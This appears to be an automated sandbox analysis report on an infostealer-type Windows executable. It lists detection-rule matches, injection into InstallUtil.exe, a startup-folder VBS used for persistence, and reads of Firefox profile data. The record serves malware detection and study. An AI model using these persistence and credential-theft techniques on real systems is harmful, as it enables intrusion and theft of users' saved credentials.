                      Source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B02D0 NtProtectVirtualMemory,0_2_063B02D0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B2820 NtResumeThread,0_2_063B2820
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B02CA NtProtectVirtualMemory,0_2_063B02CA
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B2818 NtResumeThread,0_2_063B2818
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B80A68 NtResumeThread,5_2_05B80A68
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B80A60 NtResumeThread,5_2_05B80A60
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9EE70 NtProtectVirtualMemory,5_2_05B9EE70
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9EE69 NtProtectVirtualMemory,5_2_05B9EE69
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_00A5DA1C0_2_00A5DA1C
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E7A2780_2_05E7A278
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E767A40_2_05E767A4
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E767A80_2_05E767A8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E7679C0_2_05E7679C
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E767980_2_05E76798
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E7620F0_2_05E7620F
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_05E762180_2_05E76218
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B32A70_2_063B32A7
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063B00060_2_063B0006
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063CD2C00_2_063CD2C0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C59600_2_063C5960
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C9D580_2_063C9D58
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C9D550_2_063C9D55
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C72070_2_063C7207
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063CD2B00_2_063CD2B0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C59500_2_063C5950
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A205680_2_06A20568
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A20D740_2_06A20D74
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A248C00_2_06A248C0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A216000_2_06A21600
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A2065B0_2_06A2065B
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A215F10_2_06A215F1
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A205580_2_06A20558
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A25AC80_2_06A25AC8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A24BE70_2_06A24BE7
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A383E00_2_06A383E0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A383D00_2_06A383D0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A387720_2_06A38772
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A3003C0_2_06A3003C
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A300070_2_06A30007
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A300400_2_06A30040
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A311B90_2_06A311B9
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A311C80_2_06A311C8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A371C80_2_06A371C8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A371D80_2_06A371D8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A389000_2_06A38900
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B84DB80_2_06B84DB8
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8C0B00_2_06B8C0B0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8C0C00_2_06B8C0C0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8EDEE0_2_06B8EDEE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06C400400_2_06C40040
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06C4003F0_2_06C4003F
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06EBDE400_2_06EBDE40
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06EA00400_2_06EA0040
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06EA00210_2_06EA0021
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0329E5003_2_0329E500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0329AA0B3_2_0329AA0B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_03294A903_2_03294A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_03293E783_2_03293E78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0329DC983_2_0329DC98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_032941C03_2_032941C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CEA1983_2_06CEA198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF56403_2_06CF5640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF66683_2_06CF6668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF7DF03_2_06CF7DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CFB2A33_2_06CFB2A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CFC2003_2_06CFC200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF31003_2_06CF3100
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF77103_2_06CF7710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF240B3_2_06CF240B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CFE4183_2_06CFE418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF5D5F3_2_06CF5D5F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF00403_2_06CF0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF00073_2_06CF0007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CF00233_2_06CF0023
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0227DA1C5_2_0227DA1C
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B814C35_2_05B814C3
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9B9C05_2_05B9B9C0
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9B9B05_2_05B9B9B0
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B980505_2_05B98050
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B980405_2_05B98040
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05CEA2785_2_05CEA278
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05CE67A85_2_05CE67A8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05CE62085_2_05CE6208
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05CE62185_2_05CE6218
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068505685_2_06850568
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068582305_2_06858230
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06850D745_2_06850D74
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068548B15_2_068548B1
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068516005_2_06851600
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0685065B5_2_0685065B
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068515F15_2_068515F1
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068505585_2_06850558
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06855AC85_2_06855AC8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06854BE75_2_06854BE7
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068683E05_2_068683E0
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068683D05_2_068683D0
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068687725_2_06868772
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068600075_2_06860007
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068600405_2_06860040
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068611B95_2_068611B9
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068611C85_2_068611C8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068671C85_2_068671C8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068671D85_2_068671D8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_068689005_2_06868900
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_069B4DB85_2_069B4DB8
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_069BEDEE5_2_069BEDEE
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_069BC0B05_2_069BC0B0
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_069BC0C05_2_069BC0C0
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06A700075_2_06A70007
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06A700405_2_06A70040
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06CEDE405_2_06CEDE40
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06CD00405_2_06CD0040
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06CD00065_2_06CD0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02BEE6808_2_02BEE680
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02BE4A988_2_02BE4A98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02BEA9588_2_02BEA958
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02BE3E808_2_02BE3E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02BE41C88_2_02BE41C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0657A1948_2_0657A194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0657BB588_2_0657BB58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065856408_2_06585640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065866688_2_06586668
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065824188_2_06582418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0658C2008_2_0658C200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0658B33F8_2_0658B33F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_06587DF08_2_06587DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065877108_2_06587710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0658E4188_2_0658E418
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065800408_2_06580040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_06585D708_2_06585D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_065800068_2_06580006
                      Source: Ref#1550238.exeStatic PE information: invalid certificate
                      Source: Ref#1550238.exe, 00000000.00000002.2508714224.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2527496327.00000000068C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameElzzhhjql.dll" vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElzzhhjql.dll" vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.00000000039F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000000.1505905431.00000000002B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000028B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#1550238.exe
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.00000000026F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#1550238.exe
                      Source: Ref#1550238.exeBinary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
                      Source: Ref#1550238.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 5.2.vdvfyt.exe.38777e0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#1550238.exe.3a34098.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#1550238.exe, ElementProcessor.csCryptographic APIs: 'TransformFinalBlock'
                      Source: vdvfyt.exe.0.dr, ElementProcessor.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#1550238.exe.3afa8f8.2.raw.unpack, ElementProcessor.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/3
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: Ref#1550238.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#1550238.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Ref#1550238.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile read: C:\Users\user\Desktop\Ref#1550238.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#1550238.exe "C:\Users\user\Desktop\Ref#1550238.exe"
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
